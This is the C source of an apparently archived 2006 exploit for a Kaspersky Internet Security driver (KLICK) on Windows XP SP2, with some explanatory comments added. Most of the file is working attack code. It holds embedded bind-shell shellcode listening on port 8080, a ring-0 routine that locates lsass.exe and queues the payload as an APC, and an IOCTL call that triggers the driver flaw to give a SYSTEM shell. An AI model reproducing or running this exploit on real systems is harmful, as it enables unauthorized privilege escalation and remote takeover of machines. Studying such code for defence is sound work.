////////////////////////////////////
///// AVP (Kaspersky)
////////////////////////////////////
//// FOR EDUCATIONAL PURPOSES ONLY
//// Kernel Privilege Escalation #2
//// Exploit
//// Rubén Santamarta
//// www.reversemode.com
//// 01/09/2006
////
////
////Modify by Nanika
////naninb[at]gmail.com
////nanika[at]chroot.org
////Exploit Get SYSTEM SHELL PORT 8080
////WindowsXP Version SP2+ Kaspersky Internet Security 6.0.0.303
////Do not Enable Hardware DEP
////Reference:
////http://hitcon.org/download/2005/Windows_Kernel_Shellcode_Exploit.pdf
////http://research.eeye.com/html/Papers/download/StepIntoTheRing.pdf
////http://www.security.org.sg/code/sdtrestore.html
////http://www.reversemode.com/
////
////
////
////I AM NOT Japanese :P
////希望能 給一些研究Kernel Exploit的人有一些幫助
////分享是有益的
////////////////////////////////////
#define sysenter __asm __emit 0x0f __asm __emit 0x34
#include <windows.h>
#include <stdio.h>
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define PAGE_READONLY 0x02
#define PAGE_READWRITE 0x04
#define DEF_KERNEL_BASE 0x80400000L
#define SystemModuleInformation 11
#define PROT_MEMBASE 0x80000000
typedef LONG NTSTATUS;
/* One entry of the SystemModuleInformation (class 11) reply from
   NtQuerySystemInformation, as laid out by this file. getKernelBase()
   reads only Base and ImageName; the remaining fields are carried for
   layout and are never interpreted here. */
typedef struct _SYSTEM_MODULE_INFORMATION
{
ULONG Reserved[2];
PVOID Base; /* load address of the module; used as the kernel base */
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset; /* not used by this file */
CHAR ImageName[256]; /* compared against "ntoskrnl.exe" in getKernelBase() */
} SYSTEM_MODULE_INFORMATION;
/* Resolved by getNativeAPIs() from ntdll.dll; NULL until then. */
NTSTATUS (WINAPI * _NtQuerySystemInformation)(UINT, PVOID, ULONG, PULONG);
/* User-mode mapping of ntoskrnl.exe (LoadLibrary), used only to compute
   export offsets in main(); freed again before the device is opened. */
HINSTANCE base;
/* Kernel image base as reported by getKernelBase(). */
DWORD *kbase;
/* Kernel-space addresses of four ntoskrnl exports. main() derives each as
   (user-mode export address - user-mode image base + kbase); they are read
   by Ring0Function(). The int* type is only a convenience for the pointer
   arithmetic in main(). */
int *ExAllocatePool;
int *KeInitializeApc;
int *KeInsertQueueApc;
int *ZwYieldExecution;
/* Opaque user-mode payload bytes; per the author's notes below it is a
   470-byte bind shell on TCP port 8080. Ring0Function() copies it into a
   fixed user-visible page. From a defensive standpoint this byte sequence,
   and an unexpected listener on port 8080, are the observable artifacts. */
unsigned char code[] =
//USER MODE Shellcode bind port 8080
//470bytes
"x90x90x90x90x90"
"x83xecx34x8bxf4xe8x47x01x00x00x89x06xffx36x68x8e"
"x4ex0execxe8x61x01x00x00x89x46x08xffx36x68xadxd9"
"x05xcexe8x52x01x00x00x89x46x0cx68x6cx6cx00x00x68"
"x33x32x2ex64x68x77x73x32x5fx54xffx56x08x89x46x04"
"xffx36x68x72xfexb3x16xe8x2dx01x00x00x89x46x10xff"
"x36x68x7exd8xe2x73xe8x1ex01x00x00x89x46x14xffx76"
"x04x68xcbxedxfcx3bxe8x0ex01x00x00x89x46x18xffx76"
"x04x68xd9x09xf5xadxe8xfex00x00x00x89x46x1cxffx76"
"x04x68xa4x1ax70xc7xe8xeex00x00x00x89x46x20xffx76"
"x04x68xa4xadx2exe9xe8xdex00x00x00x89x46x24xffx76"
"x04x68xe5x49x86x49xe8xcex00x00x00x89x46x28xffx76"
"x04x68xe7x79xc6x79xe8xbex00x00x00x89x46x2cx33xff"
"x81xecx90x01x00x00x54x68x01x01x00x00xffx56x18x50"
"x50x50x50x40x50x40x50xffx56x1cx8bxd8x57x57x68x02"
"x00x1fx90x8bxccx6ax16x51x53xffx56x20x57x53xffx56"
"x24x57x51x53xffx56x28x8bxd0x68x65x78x65x00x68x63"
"x6dx64x2ex89x66x30x83xecx54x8dx3cx24x33xc0x33xc9"
"x83xc1x15xabxe2xfdxc6x44x24x10x44xfex44x24x3dx89"
"x54x24x48x89x54x24x4cx89x54x24x50x8dx44x24x10x54"
"x50x51x51x51x6ax01x51x51xffx76x30x51xffx56x10x8b"
"xccx6axffxffx31xffx56x0cx8bxc8x57xffx56x2cxffx56"
"x14x55x56x64xa1x30x00x00x00x85xc0x78x0cx8bx40x0c"
"x8bx70x1cxadx8bx68x08xebx09x8bx40x34x8bxa8xb8x00"
"x00x00x8bxc5x5ex5dxc2x04x00x53x55x56x57x8bx6cx24"
"x18x8bx45x3cx8bx54x05x78x03xd5x8bx4ax18x8bx5ax20"
"x03xddxe3x32x49x8bx34x8bx03xf5x33xffxfcx33xc0xac"
"x3axc4x74x07xc1xcfx0dx03xf8xebxf2x3bx7cx24x14x75"
"xe1x8bx5ax24x03xddx66x8bx0cx4bx8bx5ax1cx03xddx8b"
"x04x8bx03xc5xebx02x33xc0x8bxd5x5fx5ex5dx5bxc2x04"
"x00";
/* Kernel-mode routine whose address main() hands to the KLICK driver via
   IOCTL 0x80052110; the driver is expected to call it at ring 0. Everything
   relies on hard-coded Windows XP SP2 structure offsets (see the inline
   comments) and on the kernel export addresses computed in main(), so it is
   tied to exactly the build named in the file header. The author states it
   requires hardware DEP to be disabled. The asm queues a user-mode APC
   pointing at the copied payload and returns with iretd, so the exit(1)
   after the asm block is never reached on the intended path. */
void Ring0Function()
{
/*
printf("----[RING0]----n");
printf("Hello From Ring0!n");
printf("----[RING0]----nn");
WinExec("cmd.exe",SW_SHOW);
*/
__asm
{
nop
nop
nop
nop
nop
nop
nop
nop
/*start here*/
mov eax,fs:[0x124]//TEB
mov esi,[eax+0x44]//EPROCESS
mov eax,esi
search:
mov eax,[eax+0x88] //activeprocess
sub eax,0x88
// cmp dword ptr[eax+0x84],0x444//EPROCESS_PID
cmp dword ptr[eax+0x174],'sasl'//FileName lsass.exe
jne search
// mov ebx,dword ptr[eax+0xc8]//system token
mov ebx,eax
lea esi,code//code
mov ecx,0x1d6// code = 0x1d6
mov dword ptr[edi],0xffdf0800//Kernel ffdf0000=user 7ffe0000
push edi
mov edi,[edi]
rep movsb
pop edi
mov ecx,dword ptr[ebx+0x190]
finddelay:
mov ecx,[ecx]
cmp byte ptr[ecx-0x1ff],0x5//1ff =ethread list - state 0x5=wait
jnz finddelay
sub ecx,0x22c
mov ebp,ecx
push 0x30//APC Object sizeof
push 0 //Nonpage
mov eax,ExAllocatePool//ExAllocatePool for APC Object
call eax//call ExAllocatePool
mov esi,eax
xor edx,edx
push edx//NULL
push 01//UserMode
// push dword ptr[edi]//user mode shellcode
mov eax,0x7ffe0800//user mode shellcode
push eax//User Mode routine
push edx//NULL
mov eax,ZwYieldExecution//0x804dd668//804dd237=kernel routine ret
push eax//Kernel Mode routine
push edx//NULL
push ebp//ETHREAD
push esi//APC object
mov eax,KeInitializeApc //initialize APC
call eax
xor ecx,ecx
xor edx,edx
xor eax,eax
push eax
push eax
push ebp//ETHREAD
push esi//APC Object
mov eax,KeInsertQueueApc
call eax
// test eax,eax
// jz recall
mov byte ptr[ebp+0x4a],0x1
/*
push 0x80000000
push 0
push 0
mov eax,0x804dd4b8
call eax
*/
/*
yeldloop:
mov eax,0x804df4d5
call eax
jmp yeldloop
*/
iretd
/*end here*/
int 3
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
/* Only reached if the asm above falls through, which it does not on the intended path. */
exit(1);
//printf("WindowsXP Version :Pnn");
}
/* Resolve ZwQuerySystemInformation from the already-loaded ntdll.dll into
   the file-scope _NtQuerySystemInformation pointer.
   Returns TRUE when the export was found, FALSE otherwise (the pointer is
   then NULL and must not be called). */
BOOL getNativeAPIs(void)
{
HMODULE ntdll = GetModuleHandle("ntdll.dll");
FARPROC proc = GetProcAddress(ntdll, "ZwQuerySystemInformation");
*(FARPROC *)&_NtQuerySystemInformation = proc;
return (proc != NULL) ? TRUE : FALSE;
}
/* Query the loaded-module list (SystemModuleInformation) and return the
   load address of the entry this code treats as ntoskrnl.exe.
   Returns DEF_KERNEL_BASE if the heap allocation or the query fails, or if
   no entry is selected. Requires getNativeAPIs() to have succeeded first;
   _NtQuerySystemInformation is called unconditionally. */
DWORD getKernelBase(void)
{
HANDLE hHeap = GetProcessHeap();
NTSTATUS Status;
ULONG cbBuffer = 0x8000;
PVOID pBuffer = NULL;
DWORD retVal = DEF_KERNEL_BASE;
/* Grow the buffer by doubling until the query no longer reports
   STATUS_INFO_LENGTH_MISMATCH; every failure path frees the buffer. */
do
{
pBuffer = HeapAlloc(hHeap, 0, cbBuffer);
if (pBuffer == NULL)
return DEF_KERNEL_BASE;
Status = _NtQuerySystemInformation(SystemModuleInformation,
pBuffer, cbBuffer, NULL);
if(Status == STATUS_INFO_LENGTH_MISMATCH)
{
HeapFree(hHeap, 0, pBuffer);
cbBuffer *= 2;
}
else if(Status != STATUS_SUCCESS)
{
HeapFree(hHeap, 0, pBuffer);
return DEF_KERNEL_BASE;
}
}
while (Status == STATUS_INFO_LENGTH_MISMATCH);
/* The reply is a DWORD entry count followed by the entries. */
DWORD numEntries = *((DWORD *)pBuffer);
SYSTEM_MODULE_INFORMATION *smi = (SYSTEM_MODULE_INFORMATION *)((char *)pBuffer + sizeof(DWORD));
for(DWORD i = 0; i < numEntries; i++)
{
/* NOTE(review): strcmpi() returns 0 on a match, so this branch is
   entered for the first entry whose name differs from "ntoskrnl.exe";
   the printed name shows which entry was actually taken. */
if(strcmpi(smi->ImageName, "ntoskrnl.exe"))
{
printf("%.8X - %sn", smi->Base, smi->ImageName);
retVal = (DWORD)(smi->Base);
break;
}
smi++;
}
HeapFree(hHeap, 0, pBuffer);
return retVal;
}
/* Display the system text for the current GetLastError() value in a
   message box, then terminate the process with status 1. Never returns. */
VOID ShowError()
{
DWORD lastError = GetLastError();
LPVOID message = NULL;
DWORD flags = FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM;
FormatMessage(flags, NULL, lastError,
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR)&message, 0, NULL);
MessageBoxA(0, (LPTSTR)message, "Error", 0);
exit(1);
}
/* Entry point. Checks for Windows 5.1 (XP), computes kernel addresses of
   four ntoskrnl exports from the user-mode image, opens the KLICK device
   and sends IOCTL 0x80052110 with an 8-byte input buffer whose first DWORD
   is the address of Ring0Function(). The return value of getNativeAPIs() is
   not checked, so a failed lookup leaves _NtQuerySystemInformation NULL
   before getKernelBase() calls it. For defenders, an unprivileged process
   opening \\.\KLICK and issuing this IOCTL code is the event to look for. */
int main(int argc, char *argv[])
{
DWORD InBuff[1];
DWORD dwIOCTL,OutSize,InSize,junk;
HANDLE hDevice;
OSVERSIONINFO ov;
system("cls");
printf("#######################n");
printf("## AVP Ring0 Exploit ##n");
printf("#######################n");
printf("Ruben Santamartanwww.reversemode.comnn");
printf("Modify by Nanikann");
printf("naninb[at]gmail.comn");
printf("www.chroot.orgn");
printf("WindowsXP Version SP2+ Kaspersky Internet Security 6.0.0.303 :Pn");
/* Refuse anything other than major 5 / minor 1 (Windows XP); the kernel
   offsets in Ring0Function() are specific to that release. */
ov.dwOSVersionInfoSize = sizeof(ov);
GetVersionEx(&ov);
if(ov.dwMajorVersion != 5)
{
printf("Sorry, this version supports only WinXP.n");
return 1;
}
if(ov.dwMinorVersion != 1)
{
printf("Sorry, this version supports only WinXP.n");
return 1;
}
getNativeAPIs();
kbase=(unsigned long *)getKernelBase();
/* Map ntoskrnl.exe as a plain DLL to read its export table, then rebase
   each export from the user-mode mapping to the kernel base. */
base=LoadLibrary("ntoskrnl.exe");
ExAllocatePool=(int *)GetProcAddress(base,"ExAllocatePool");
KeInitializeApc=(int *)GetProcAddress(base,"KeInitializeApc");
KeInsertQueueApc=(int *)GetProcAddress(base,"KeInsertQueueApc");
ZwYieldExecution=(int *)GetProcAddress(base,"ZwYieldExecution");
ExAllocatePool=(int *)((int *)ExAllocatePool - (int *)base+(int *)kbase);
KeInitializeApc=(int *)((int *)KeInitializeApc-(int *)base+(int *)kbase);
KeInsertQueueApc=(int *)((int *)KeInsertQueueApc-(int *)base+(int *)kbase);
ZwYieldExecution=(int *)((int *)ZwYieldExecution-(int *)base+(int *)kbase);
FreeLibrary(base);
/* Device open with no access rights requested; OPEN_EXISTING (3). */
hDevice = CreateFile("\\.\KLICK",
0,
0,
NULL,
3,
0,
0);
//////////////////////
///// INFO
//////////////////////
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("[!] KLICK Device Handle [%x]n",hDevice);
//////////////////////
///// BUFFERS
//////////////////////
InSize = 0x8;
InBuff[0] =(DWORD) Ring0Function; // Ring0 ShellCode Address
//////////////////////
///// IOCTL
//////////////////////
dwIOCTL = 0x80052110;
printf("[!] IOCTL [0x%x]nn",dwIOCTL);
printf("Exploit TEST!!!!!!!!!!nn");
printf("Telnet x.x.x.x 8080 get SYSTEM shell!!!!!!!! :Pnn");
/* Result of DeviceIoControl is not examined; InSize and OutSize are
   declared but only the literal 0x8 is passed. */
DeviceIoControl(hDevice,
dwIOCTL,
InBuff,0x8,
(LPVOID)NULL,0,
&junk,
NULL);
}
// milw0rm.com [2006-10-29] |